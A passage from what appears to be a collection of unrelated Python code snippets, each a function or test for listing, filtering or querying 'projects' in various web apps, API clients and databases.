self.assertEqual(len(response_other.json[\"results\"]), 2)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_other.json[\"results\"]],\n [test_project_5.id, test_project_6.id],\n )\n\n # Test filter by multiple mapping types returns projects with any of the mapping types in the list.\n # Act\n response_all = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": \"BUILDINGS,ROADS,WATERWAYS,LAND_USE,OTHER\"},\n )\n # Assert\n self.assertEqual(response_all.status_code, 200)\n self.assertEqual(len(response_all.json[\"results\"]), 6)\n\n # Test mappingTypesExact returns only projects with exact mapping types.\n # Act\n response_exact = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"mappingTypes\": \"BUILDINGS\", \"mappingTypesExact\": \"true\"},\n )\n # Assert\n self.assertEqual(response_exact.status_code, 200)\n self.assertEqual(len(response_exact.json[\"results\"]), 1)\n self.assertEqual(\n response_exact.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def _get_projects(current_project_name):\n projects = []\n\n unique_project_changes = Change.objects.order_by().values(\n 'project_name').distinct()\n for change in unique_project_changes:\n projects.append(change['project_name'])\n\n # sort alphabetically\n projects.sort()\n\n # insert 'all' option as 
it should be present always\n projects.insert(0, PROJECT_ALL)\n\n # if current_project_name is valid, make it the first element in list so\n # that it shows up as selected in project choice drop down\n if current_project_name != PROJECT_ALL and current_project_name in projects:\n projects.remove(current_project_name)\n projects.insert(0, current_project_name)\n elif current_project_name != PROJECT_ALL:\n logging.error(\"Currently selected project %s not found in any changes.\"\n \" Removing from list.\", current_project_name)\n logging.debug(\"Returning list of projects: %r\", projects)\n return projects", "def test_get_current(self, rf, projects):\n # get queryset\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n view.get_queryset()\n qs = view.get_current()\n\n # slavic working group grant ended so it is \"past\"\n assert projects[\"derrida\"] in qs\n assert projects[\"pliny\"] in qs\n assert projects[\"ocampo\"] in qs\n assert projects[\"slavic\"] not in qs", "def test_projects_get(self):\n response = self.client.open('/project-tracker/projects',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def get_projects(self):\n projects = []\n page = 1\n while not len(projects) % 100:\n projects += self._get('/projects?{0}'.format(urllib.urlencode({'per_page': 100, 'page': page})))\n if not projects:\n break\n page += 1\n return projects", "def test_returns_limit_projects(self):\n # Arrange\n # Create and arrange test projects\n self.arrange_projects()\n # Act\n response = self.client.get(\n f\"{self.url}?limit=1\", headers={\"Authorization\": self.user_session_token}\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)", "def request_project_list(event_id):\n is_moar = bool(request.args.get('moar', type=bool))\n host_url = request.host_url\n return get_project_list(event_id, host_url, is_moar)", "def filter_queryset(self, request, queryset, view):\n user = request.user\n project_id = view.kwargs.get(view.lookup_field)\n\n if user.is_anonymous:\n return queryset.filter(Q(shared=True))\n\n if project_id:\n int_or_parse_error(\n project_id,\n \"Invalid value for project_id. 
It must be a positive integer.\",\n )\n\n # check if project is public and return it\n try:\n project = queryset.get(id=project_id)\n except ObjectDoesNotExist as non_existent_object:\n raise Http404 from non_existent_object\n\n if project.shared:\n return queryset.filter(Q(id=project_id))\n\n return super().filter_queryset(request, queryset, view)", "def test_get_projects(self):\n for project in ['TEST', 'NEWTEST', 'MYPROJECT']:\n self.db.insert_single_result(generate_mock_result(project=project))\n projects = self.db.get_projects()\n self.assertItemsEqual(['MYPROJECT', 'NEWTEST', 'TEST'], projects)", "def get_project_list(self, dummy_project):\n # TODO: domain scope 403 is probably to do with faulty keystone policy config -- revise?\n if not self._projects:\n self._projects = self._get_keystone_client(dummy_project).projects.list()\n\n return self._projects", "def db_projects():\n return [{\"name\": \"IT\"}, {\"name\": \"Financial\"}, {\"name\": \"Failed\"}]", "def list_projects():\n if '.wcscanner' not in os.listdir(context.__BASE_PATH__):\n return []\n return os.listdir(context.__PROJECTS_PATH__)", "def selectable_projects():\n\n db = current.db\n s3db = current.s3db\n\n # Lookup projects with provider self-registration\n ptable = s3db.project_project\n ttable = s3db.project_project_tag\n join = ttable.on((ttable.project_id == ptable.id) & \\\n (ttable.tag == \"APPLY\") & \\\n (ttable.value == \"Y\") & \\\n (ttable.deleted == False))\n query = (ptable.deleted == False)\n rows = db(query).select(ptable.id,\n ptable.name,\n join = join,\n )\n projects = {row.id: row.name for row in rows}\n return projects", "def projects(self, request, pk=None):\n\n obj = self.get_object()\n try:\n query = models.Project.objects.filter(\n subject=obj.subject,\n assign=obj\n )\n serializer = self.get_serializer(query, many=True)\n\n id = self.request.query_params.get('id')\n\n if id:\n query = get_object_or_404(\n models.Project,\n id=id,\n assign=obj\n )\n return self.filtering(request, query)\n\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def test_search_project(self):\n title = Project.search_project(\"dee\")\n self.assertTrue(len(title) > 0)", "def getProjectsQueryForEval(keys_only=False, ancestor=None, **properties):\n q = getProjectsQuery(keys_only, ancestor, **properties)\n q.filter('status IN', [project_model.STATUS_ACCEPTED, 'failed', 'completed'])\n return q", "def test_returns_all_projects_that_user_is_permitted_if_action_set_to_any(self):\n # Arrange\n self.test_project_2.private = False\n # Since test_author is BEGINNER, they can only map projects with mapping permission ANY.\n self.test_project_1.mapping_permission = MappingPermission.ANY.value\n self.test_project_1.save()\n self.test_project_2.mapping_permission = MappingPermission.ANY.value\n self.test_project_2.save()\n # Archive test_project_2 so that it is not returned if action set to any.\n test_project_4 = Project.clone(self.test_project_2.id, self.test_author.id)\n test_project_4.status = ProjectStatus.ARCHIVED.value\n # Validate all tasks of test_project_2 to check finished projects are not returned if action set to any.\n MappingService.map_all_tasks(self.test_project_2.id, self.test_author.id)\n ValidatorService.validate_all_tasks(self.test_project_2.id, self.test_author.id)\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"action\": \"any\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n 
self.assertEqual(len(response.json[\"results\"]), 2)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )\n self.assertEqual(\n response.json[\"results\"][1][\"projectId\"], self.test_project_2.id\n )", "def test_project_list_with_no_projects(self):\n response = self.client.get(reverse('portfolio:project_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'There are no portfolio projects.')", "def get_projects():\n return Project.query.all()", "def test_returns_projects_with_tasks_to_validate_if_action_set_to_validate(self):\n # Arrange\n self.test_project_2.private = False\n # Since test_author is BEGINNER, they can only validate projects with validation permission ANY.\n self.test_project_1.validation_permission = ValidationPermission.ANY.value\n self.test_project_1.save()\n self.test_project_2.validation_permission = ValidationPermission.ANY.value\n self.test_project_2.save()\n # Reset all tasks of test_project_2 so that there are no tasks ready to validate.\n MappingService.map_all_tasks(self.test_project_2.id, self.test_author.id)\n ValidatorService.validate_all_tasks(self.test_project_2.id, self.test_author.id)\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"action\": \"validate\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n # Test_project_2 has no tasks to validate, it should not be returned even when user has permsiion to validate.\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def test_returns_private_projects_if_user_is_allowed(self):\n # Arrange\n # Create and arrange test projects\n project_1, project_2, project_3 = self.arrange_projects()\n project_3.private = True\n project_3.save()\n self.test_author.role = UserRole.ADMIN.value\n self.test_author.save()\n # Act\n response = self.client.get(\n self.url, headers={\"Authorization\": self.user_session_token}\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 3)\n returned_project_ids = sorted(\n [i[\"projectId\"] for i in response.json[\"results\"]]\n )\n self.assertEqual(\n returned_project_ids, [project_1.id, project_2.id, project_3.id]\n )", "def get_all_projects(self, org):\n return [proj for proj in Project.objects.filter(org=org)]", "def test_read_project(self):\n pass", "def test_read_project(self):\n pass", "def test_filter_with_plone3_query(self):\n portal = self.layer['portal']\n req = test_request()\n # Search.filter_query() will get SearchableText from form if not\n # passed in explicit query argument:\n req.form['SearchableText'] = 'jobs'\n req.form['Title'] = 'Human resource'\n req.form['Description'] = ''\n req.form['created'] = [DateTime('1970/02/01 00:00:00 GMT+0')]\n req.form['created_usage'] = 'range:min'\n req.form['submit'] = 'Search'\n view = getMultiAdapter((portal, req), name=u'search')\n res = view.results(batch=False)\n self.assertEqual([], [r for r in res])", "def get_projects(self):\n response = self.request(verb=requests.get, address=\"projects\")\n # FIXME: if no results, must we raise an exception?\n return response[\"results\"] if \"results\" in response else response", "def get_projects(self):\n unaligned_path = self.get_unaligned_path()\n logger.debug(\"collecting list of projects\")\n return [p for p in os.listdir(unaligned_path)\n if 
len(parsing.get_project_label(p))]", "def get_public_projects_query():\n return Q(access_policy=AccessPolicy.OPEN)", "def parse_one_project(self, args, project_arg):\n project = self.linguist_worktree.get_linguist_project(project_arg, raises=True)\n return [project]", "def getProjectsQueryForEvalForOrgs(org_keys):\n query = getProjectsQueryForOrgs(org_keys)\n query.filter(\n 'status IN', [project_model.STATUS_ACCEPTED, 'failed', 'completed'])\n return query", "def test_get_queryset(self, rf, projects):\n request = rf.get(\"/projects/my\")\n view = MyProjectListView()\n view.setup(request)\n view.dispatch(request)\n qs = view.get_queryset()\n\n # should be ordered by newest grant\n assert qs[0] == projects[\"derrida\"] # RPG started 1yr ago\n assert qs[1] == projects[\"pliny\"] # started 400 days ago\n assert qs[2] == projects[\"ocampo\"] # started 450 days ago\n assert qs[3] == projects[\"slavic\"] # seed grant 2yrs ago", "def test_returns_projects_filter_by_statuses(self):\n # Arrange\n self.test_project_1.status = ProjectStatus.DRAFT.value\n self.test_project_1.save()\n # Set project_2 to be allowed for all users removing as private.\n self.test_project_2.private = False\n self.test_project_2.save()\n # Set status of test_project_3 to archived.\n self.test_project_3.status = ProjectStatus.ARCHIVED.value\n self.test_project_3.save()\n\n # Act\n response_pub = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.PUBLISHED.name]},\n )\n # Assert\n self.assertEqual(response_pub.status_code, 200)\n self.assertEqual(len(response_pub.json[\"results\"]), 1)\n self.assertEqual(\n response_pub.json[\"results\"][0][\"projectId\"], self.test_project_2.id\n )\n\n # Act\n response_draft = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.DRAFT.name]},\n )\n # Assert\n self.assertEqual(response_draft.status_code, 200)\n self.assertEqual(len(response_draft.json[\"results\"]), 1)\n self.assertEqual(\n response_draft.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )\n\n # Act\n response_archived = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\"projectStatuses\": [ProjectStatus.ARCHIVED.name]},\n )\n # Assert\n self.assertEqual(response_archived.status_code, 200)\n self.assertEqual(len(response_archived.json[\"results\"]), 1)\n self.assertEqual(\n response_archived.json[\"results\"][0][\"projectId\"], self.test_project_3.id\n )\n\n # Test multiple statuses returns all projects with those statuses.\n # Act\n response_all = self.client.get(\n self.url,\n headers={\"Authorization\": self.author_session_token},\n query_string={\n \"projectStatuses\": \"PUBLISHED,DRAFT,ARCHIVED\",\n },\n )\n # Assert\n self.assertEqual(response_all.status_code, 200)\n self.assertEqual(len(response_all.json[\"results\"]), 3)\n self.assertListEqual(\n [i[\"projectId\"] for i in response_all.json[\"results\"]],\n [self.test_project_1.id, self.test_project_2.id, self.test_project_3.id],\n )", "def test_private_projects_are_not_returned_if_user_not_logged_in(self):\n # Arrange\n # Create and arrange test projects\n project_1, project_2, project_3 = self.arrange_projects()\n project_3.private = True\n project_3.save()\n # Act\n response = self.client.get(self.url)\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 2)\n 
self.assertEqual(response.json[\"results\"][0][\"projectId\"], project_2.id)\n self.assertEqual(response.json[\"results\"][1][\"projectId\"], project_1.id)", "def search_project_or_study(obj_type):\n\n matches = []\n response = None\n\n try:\n if obj_type not in set([\"projects\", \"studies\"]):\n raise Exception(\"Invalid object type specified\")\n\n possible_filters = filters_d[obj_type]\n \n for f in file_dict[obj_type][\"valid\"].values():\n json_file = data_dir + f\n json_s = open(json_file, \"r\").read()\n json_obj = json.loads(json_s)\n add_to_matches = True\n\n for filter_name in possible_filters:\n filter_val = request.args.get(filter_name)\n if filter_val:\n if json_obj[filter_name] != filter_val:\n add_to_matches = False\n \n if add_to_matches:\n matches.append(json_s)\n\n response_body = \"[\" + \",\".join(matches) + \"]\"\n response = get_response(response_body, status=200)\n\n except Exception as e:\n print(\"bad request\")\n response_body = '''{\"message\": \"invalid resource '%s'\"}''' % obj_type\n response = get_response(response_body, status=400)\n\n return response", "def test_get_models_throws_if_project_does_not_exist(\n fc: fetcher.Fetcher, project, model\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting projects.\" in str(exc.value)", "def test_project_list(self):\n rv = self.app.get(\"/\")\n self.assertIn(\"Assignment0\", rv.data)\n self.assertIn(\"Assignment1.0\", rv.data)\n self.assertIn(\"Assignment2.0\", rv.data)", "def get_projects(self, _is_simple=False):\n req_url = f\"{self.url}/projects\"\n if _is_simple:\n req_url += \"?simple=true\"\n ret = requests.get(req_url, headers = self.req_header)\n return ret.json()", "def test_get_projects(client, session, models, tokens):\n response = client.get(\n \"/projects\", headers={\"Authorization\": f\"Bearer {tokens['read']}\"}\n )\n assert response.status_code == 200\n assert len(response.json) > 0", "def multiple_projects():\n message = \"\"\"\nFound {} that match your change.\nSince there is no support for tracking changes in different\nprojects, try to add more attributes to focus on a specific change\nor set of changes.\n\"\"\".format(crayons.red(\"multiple different projects\"))\n return message", "def test_show_project_list(self):\n fake_project = FakeResource(1)\n\n # This mocks is faking keystone retrieving a defined list of\n # projects\n patch('identity.views.Keystone.project_list',\n Mock(return_value=[fake_project])).start()\n\n render_mock = patch(\n 'identity.views.ListProjectView.render_to_response').start()\n\n response = self.view(self.request)\n\n render_args = render_mock.call_args[0][0]\n computed = render_args['projects'][0]\n\n self.assertEqual(computed, fake_project.to_dict())", "def do_projects(self, arg):\n args = shlex.split(arg)\n limit = 10\n from_date = to_date = ''\n if args:\n limit = 0\n try:\n from_date, to_date = helpers.parse_date_parameters(args)\n except ValueError, msg:\n print(msg)\n return\n projects = self.db.get_projects_with_activity_field(\n from_date, to_date, limit=limit)\n refined = map(lambda x: [\n x['pid'], x['name'],\n '[Active]' if x['active'] else '[closed]',\n datetime.datetime.strftime(x['created'], '%c').decode('utf8'),\n x['description']], projects)\n print(tabulate(refined, ['ID', 'Project', 'Activity', 'Created',\n 'Description']))", "def get_jira_defects(project):\n return get_jira_issues('project = \"{}\" AND filter = 19589'.format(project))", "def 
get_projects(self):\n rps = self.start_date\n\n return Project.objects.filter(\n Q(active=True)\n & Q(\n Q(start_date__lte=rps)\n | Q(\n Q(start_date__gte=rps)\n & Q(start_date__lte=datetime.datetime.now().date())\n )\n | Q(start_date__isnull=True)\n )\n & Q(\n Q(end_date__gte=rps)\n | Q(end_date__isnull=True)\n )\n )", "def run_project_checks(sub: Submission, logger):\n\n project = sub.project\n codes = []\n found_submitter = False\n found_submitter_details = False\n\n # Contacts\n if not project.contacts:\n logger.error(\"No contacts found. At least one contact must be included.\")\n codes.append(\"PROJ-E01\")\n else:\n # Roles\n role_term = ontology_term(\"role\")\n allowed_roles = get_term_descendants(role_term[\"ontology\"], role_term[\"uri\"], logger)\n for i, c in enumerate(project.contacts):\n if c.roles:\n for r in c.roles:\n role_value = r.lower().rstrip()\n if role_value not in allowed_roles:\n logger.warning(\"Contact role \\\"{}\\\" is not an allowed term.\".format(role_value))\n codes.append(\"PROJ-E05\")\n elif role_value == \"submitter\":\n found_submitter = True\n if c.email and c.affiliation:\n found_submitter_details = True\n if not c.lastName:\n logger.error(\"A contact must have last name specified: {}.\".format(c))\n codes.append(\"PROJ-E02\")\n # At least one contact must have role \"submitter\"\n if not found_submitter:\n logger.error(\"At least one contact must have role \\\"submitter\\\".\")\n codes.append(\"PROJ-E03\")\n # At least one submitter contact needs email and affiliation\n if not found_submitter_details:\n logger.error(\"At least one contact with role \\\"submitter\\\" must have email and affiliation specified.\")\n codes.append(\"PROJ-E04\")\n\n # Format of PubMed ID and DOI\n if project.publications:\n for pub in project.publications:\n if pub.pubmedId:\n try:\n int(pub.pubmedId)\n except ValueError:\n logger.error(\"PubMed ID must be numerical. Got \\\"{}\\\".\".format(pub.pubmedId))\n codes.append(\"PROJ-E06\")\n if pub.doi:\n if not REGEX_DOI_FORMAT.match(pub.doi.rstrip()):\n logger.error(\"Publication DOI \\\"{}\\\" does not match expected pattern.\".format(pub.doi))\n codes.append(\"PROJ-E07\")\n\n # Release date\n if project.releaseDate:\n if not REGEX_DATE_FORMAT.match(project.releaseDate):\n logger.error(\"Release date \\\"{}\\\" is not in YYYY-MM-DD format.\".format(project.releaseDate))\n codes.append(\"PROJ-E09\")\n else:\n logger.error(\"No release date found. 
Project must have release date specified.\")\n codes.append(\"PROJ-E08\")\n\n return codes", "def test_get_valid_filter(mockclient_cl1):\n r = mockclient_cl1.get(TEST_URL + \"?p=1\")\n assert r.status_code == 200", "def open_projects(request):\n return Project.objects.prefetch_related('task_set').filter(user=request.user, open=True)", "def getSpecificData(self,\n release=\"\",\n baseline=\"\",\n project=\"\",\n filters=[\"INPUT_DATA\",\"REVIEW\",\"VTPR\",\"\"],\n source=False):\n if source:\n table = []\n type_items = \"(cvtype='ascii' or cvtype='csrc' or cvtype='incl')\"\n else:\n table = [[],[],[],[]]\n type_items = \"(cvtype='xls' or cvtype='doc' or cvtype='pdf' or cvtype='ascii' or cvtype='csrc' or cvtype='incl')\"\n enabled = True\n for list_filter in filters:\n if self._is_array(list_filter):\n for keyword in list_filter:\n self.ihm.log('Search folder containing keyword: ' + keyword)\n else:\n self.ihm.log('Search folder containing keyword: ' + list_filter)\n stdout = self._runFinduseQuery(release,project,type_items,enabled)\n #print \"STDOUT\",stdout\n\n if not stdout:\n if source:\n print \"FILTER/PROJECT\",list_filter,project\n result = []\n if self._is_array(list_filter):\n for keyword in list_filter:\n self.getItemsInFolder(keyword,\n project,\n baseline,\n release,\n only_name=True,\n with_extension=True,\n mute=True,\n recur=True,\n converted_list=result)\n if result:\n break\n else:\n self.getItemsInFolder(list_filter,\n project,\n baseline,\n release,\n only_name=True,\n with_extension=True,\n mute=True,\n recur=True,\n converted_list=result)\n if result:\n table = result\n else:\n index = 0\n for list_filter in filters:\n result = []\n if self._is_array(list_filter):\n for keyword in list_filter:\n print (\"KEYWORD:\",index,keyword)\n self.getItemsInFolder(keyword,\n project,\n baseline,\n release,\n only_name=True,\n with_extension=True,\n mute=True,\n recur=True,\n converted_list=result)\n if result:\n table[index].extend(result)\n else:\n print (\"KEYWORD2:\",list_filter)\n self.getItemsInFolder(list_filter,\n project,\n baseline,\n release,\n only_name=True,\n with_extension=True,\n mute=True,\n recur=True,\n converted_list=result)\n if result:\n table[index] = result\n index += 1\n print \"OLD TABLE\",table\n return table\n else:\n if enabled:\n if stdout != \"\":\n self.ihm.log(stdout,False)\n regexp, list_items_skipped = self._prepareRegexp(filters)\n output = stdout.splitlines()\n if not source:\n ## print \"REGEXP\"\n ## print regexp\n for line in output:\n item = self._filterRegexp(regexp[0],line)\n if item != \"\":\n list_items_skipped[0].append(item)\n item = self._filterRegexp(regexp[1],line)\n if item != \"\":\n list_items_skipped[1].append(item)\n item = self._filterRegexp(regexp[2],line)\n if item != \"\":\n list_items_skipped[2].append(item)\n # ex: SW_PLAN\\SDP\\IS_SDP_SW_PLAN_SQA.xlsm-1.7.0@SW_PLAN-1.3\n table[0] = list(set(list_items_skipped[0]))\n table[1] = list(set(list_items_skipped[1]))\n table[2] = list(set(list_items_skipped[2]))\n for data in table[0]:\n if self._is_array(filters[0]):\n text = \"\"\n for filter in filters[0]:\n text += \" \" + filter\n else:\n text = filters[0]\n self.ihm.log('Found in '+ text +' folder: ' + data,False)\n for data in table[1]:\n if self._is_array(filters[1]):\n text = \"\"\n for filter in filters[1]:\n text += \" \" + filter\n else:\n text = filters[1]\n self.ihm.log('Found in '+ text +' folder: ' + data,False)\n for data in table[2]:\n if self._is_array(filters[2]):\n text = \"\"\n for filter in filters[2]:\n 
text += \" \" + filter\n else:\n text = filters[2]\n self.ihm.log('Found in '+ text +' folder: ' + data,False)\n else:\n ## print \"REGEXP\"\n ## print regexp\n for line in output:\n item = self._filterRegexp(regexp[0],line)\n if item != \"\":\n list_items_skipped[0].append(item)\n # ex: SW_PLAN\\SDP\\IS_SDP_SW_PLAN_SQA.xlsm-1.7.0@SW_PLAN-1.3\n table = list(set(list_items_skipped[0]))\n for data in table:\n if self._is_array(filters[0]):\n text = \"\"\n for filter in filters[0]:\n text += \" \" + filter\n else:\n text = filters[0]\n self.ihm.log('Found in '+ text +' folder: ' + data,False)\n else:\n self.ihm.log('No items found with finduse command.')\n return table", "def list_projects():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_projects\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)[\"projects\"]", "def _DoFilter(context, api_version_default):\n cloud_resources.REGISTRY.SetParamDefault(\n api='sql', collection=None, param='project',\n resolver=resolvers.FromProperty(properties.VALUES.core.project))\n\n context['sql_client'] = apis.GetClientInstance('sql', api_version_default)\n context['sql_messages'] = apis.GetMessagesModule('sql', api_version_default)\n context['registry'] = cloud_resources.REGISTRY.Clone()\n context['registry'].RegisterApiByName('sql', api_version_default)\n\n return context", "def get_projects(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/projects\").json()", "def list_projects(ctx):\n pprint(ctx.obj.groups.get().data)", "def get_projects(self, source=\"all\"):\n self.projects = []\n self._project_indices_by_id = {}\n self._project_indices_by_name = {}\n\n if self.hub_type == self.NAMESPACES[\"a.\"]:\n if not self.auth.three_legged:\n self.logger.warning(\n \"Failed to get projects. '{}' hubs only supports 3-legged access token.\".format( # noqa:E501\n self.NAMESPACES[\"a.\"]\n )\n )\n else:\n for project in self.api.dm.get_projects():\n self.projects.append(\n Project(\n project[\"attributes\"][\"name\"],\n project[\"id\"][2:],\n data=project,\n app=self,\n )\n )\n\n self._project_indices_by_id[project[\"id\"][2:]] = (\n len(self.projects) - 1\n )\n self._project_indices_by_name[\n project[\"attributes\"][\"name\"]\n ] = (len(self.projects) - 1)\n\n elif self.hub_type == self.NAMESPACES[\"b.\"]:\n\n if source.lower() in (\"all\", \"docs\"):\n for project in self.api.dm.get_projects():\n self.projects.append(\n Project(\n project[\"attributes\"][\"name\"],\n project[\"id\"][2:],\n data=project,\n app=self,\n )\n )\n\n self._project_indices_by_id[project[\"id\"][2:]] = (\n len(self.projects) - 1\n )\n self._project_indices_by_name[\n project[\"attributes\"][\"name\"]\n ] = (len(self.projects) - 1)\n\n if (\n source.lower() in (\"all\", \"admin\")\n and not self.auth.three_legged\n ):\n\n for project in self.api.hq.get_projects():\n if project[\"id\"] in self._project_indices_by_id:\n self.projects[\n self._project_indices_by_id[project[\"id\"]]\n ].data = project\n else:\n self.projects.append(\n Project(\n project[\"name\"],\n project[\"id\"],\n data=project,\n app=self,\n )\n )\n self._project_indices_by_id[project[\"id\"]] = (\n len(self.projects) - 1\n )\n\n self._project_indices_by_name[project[\"name\"]] = (\n len(self.projects) - 1\n )\n\n elif source.lower() in (\"all\", \"admin\"):\n self.logger.debug(\n \"Failed to get projects. 
The BIM 360 API only supports 2-legged access tokens\" # noqa:E501\n )", "def get_projects(self):\n return conf.projects", "def list_projects():\n with BMI(_username, _password, constants.BMI_ADMIN_PROJECT) as bmi:\n ret = bmi.list_projects()\n if ret[constants.STATUS_CODE_KEY] == 200:\n table = PrettyTable(\n field_names=[\"Id\", \"Name\", \"Provision Network\"])\n projects = ret[constants.RETURN_VALUE_KEY]\n for project in projects:\n table.add_row(project)\n click.echo(table.get_string())\n else:\n click.echo(ret[constants.MESSAGE_KEY])", "def test_project_list_with_projects(self):\n # Add test projects.\n first_project = add_project(title='Title 1', description='Description 1')\n second_project = add_project(title='Title 2', description='Description 2')\n\n # Check that project list contains test projects.\n response = self.client.get(reverse('portfolio:project_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, first_project.title)\n self.assertContains(response, first_project.description)\n self.assertContains(response, second_project.title)\n self.assertContains(response, second_project.description)", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/aoi/\")\n self.assertEqual(response.status_code, 404)", "def project_list(cursor):\n query = \"SELECT * FROM projects\"\n try:\n cursor.execute(query, {},)\n except Exception as e:\n on_error(e)\n else:\n projects = cursor.fetchall()\n raise Return((projects, None))", "def get_projects(self):\n if not self.validate():\n raise SettingCustomVisionAccessFailed\n return self.get_trainer_obj().get_projects()", "def stract_scans(self, projects):\n pass", "def get_create_projects(target, proposal_ref, proposal_code='lb'):\n\n # Note that in the loader this is based on information in the PROPOSALS and VISITS files\n # TODO Multiple Visits can be defined in a file apparently - future improvement.\n # TODO NB LIne above in delete_users - redundant if using ISPYB??.\n # For the online loader it comes from the proposal_ref\n\n projects = []\n # The first word is the ISPY proposal/visit name that is used as the title of the project.\n # It can be set to OPEN in which case there are no users.\n visit = proposal_ref.split()[0]\n # If the visit is not prefixed by the proposal code\n # (typically a 2-letter sequence like \"lb\") then prefix it.\n if visit[0].isdigit():\n visit = f\"{proposal_code}{visit}\"\n project = Project.objects.get_or_create(title=visit)[0]\n projects.append(project)\n\n # If not open then delete users for the project and re-add them based on supplied fed-ids.\n delete_users(project)\n\n # Update project_id on target.\n target.project_id.add(project)\n\n # Remaining words in proposal_ref (if any) must be fedid's which are used to find users information.\n num_users = 0\n for fedid in proposal_ref.split()[1:]:\n user = User.objects.get_or_create(username=fedid, password=\"\")[0]\n project.user_id.add(user)\n num_users += 1\n if num_users == 0:\n project.open_to_public = True\n\n target.upload_progess = 10.00\n target.save()\n\n return projects", "def search(request, is_my_list=\"False\"):\n\n search_type = request.GET.get(\"submit\")\n if search_type:\n\n # get query field\n query = ''\n if request.GET.get(search_type):\n query = request.GET.get(search_type)\n\n proj_ids = []\n cod_ids = []\n\n valid_searches = [constants.STRING_TITLE, constants.STRING_DESCRIPTION, constants.STRING_PROTOCOL,\n constants.STRING_CODER, 
constants.STRING_AREA, constants.STRING_WORKINGGROUP]\n\n search_in_all = True\n for v in valid_searches:\n if v in request.GET:\n search_in_all = False\n break\n\n if search_in_all or request.GET.get(constants.STRING_TITLE):\n codings = CodingProject.objects.all()\n for cod in codings:\n if query.lower() in cod.title.lower():\n cod_ids.append(cod.id)\n\n if search_in_all or request.GET.get(constants.STRING_DESCRIPTION):\n codings = CodingProject.objects.all()\n for cod in codings:\n if query.lower() in cod.additional_information.lower():\n cod_ids.append(cod.id)\n\n if request.GET.get(constants.STRING_PROTOCOL):\n proj_ids += ProjectContainer.objects.filter(protocol__icontains=query).values_list('id', flat=True)\n\n if search_in_all or request.GET.get(constants.STRING_CODER):\n for pr in ProjectContainer.objects.all():\n for cd in pr.codings.all():\n user = Person.objects.using('datatracker').get(id=cd.coder)\n if query.lower() in user.name.lower():\n proj_ids.append(pr.id)\n break\n\n if search_in_all or request.GET.get(constants.STRING_AREA):\n for project_container in ProjectContainer.objects.all():\n docs = []\n if not project_container.docs or project_container.docs == '':\n continue\n keys = filter(None, project_container.docs.split(';'))\n docs.extend(list(DocAlias.objects.using('datatracker').filter(name__in=keys).values_list(\n 'document__group__parent__name')))\n for doc in docs:\n if query.lower() in doc[0].lower():\n proj_ids.append(project_container.id)\n break\n # ids += ProjectContainer.objects.filter(docs__document__group__parent__name__icontains=query).values_list(\n # 'id', flat=True)\n\n if search_in_all or request.GET.get(constants.STRING_WORKINGGROUP):\n for project_container in ProjectContainer.objects.all():\n docs = []\n if not project_container.docs or project_container.docs == '':\n continue\n keys = filter(None, project_container.docs.split(';'))\n docs.extend(list(\n DocAlias.objects.using('datatracker').filter(name__in=keys).values_list('document__group__name')))\n for doc in docs:\n if query.lower() in doc[0].lower():\n proj_ids.append(project_container.id)\n break\n \n if cod_ids:\n cod_ids = list(set(cod_ids))\n proj_ids += ProjectContainer.objects.filter(codings__id__in=cod_ids).values_list('id', flat=True)\n project_containers = ProjectContainer.objects.filter(id__in=list(set(proj_ids)))\n \n request.session[constants.ALL_CODINGS] = cod_ids\n request.session[constants.ALL_PROJECTS] = project_containers\n\n request.session[constants.MAINTAIN_STATE] = True\n\n return HttpResponseRedirect(\n settings.CODESTAND_PREFIX + '/codestand/matches/show_list/' + \n is_my_list + '/{0}/'.format(constants.ATT_CREATION_DATE) + 'True')\n\n else:\n return render_page(request, constants.TEMPLATE_MATCHES_SEARCH, {\n \"form\": SearchForm()\n })", "def get_created_projects(self):\n project_ouessant1 = Project.objects.get(name='Ouessant Tidal Power Phase I')\n project_ouessant2 = Project.objects.get(name='Ouessant Tidal Power Phase II')\n project_liaoning = Project.objects.get(\n name='Liaoning Linghai China Resource Power Wind Power Wind Farm'\n )\n return [project_ouessant1, project_ouessant2, project_liaoning]", "def test_returns_moderate_projects_if_difficulty_set_to_moderate(self):\n # Arrange\n self.test_project_2.private = False\n # Change difficulty of test_project_2 to easy so that it is not returned.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n 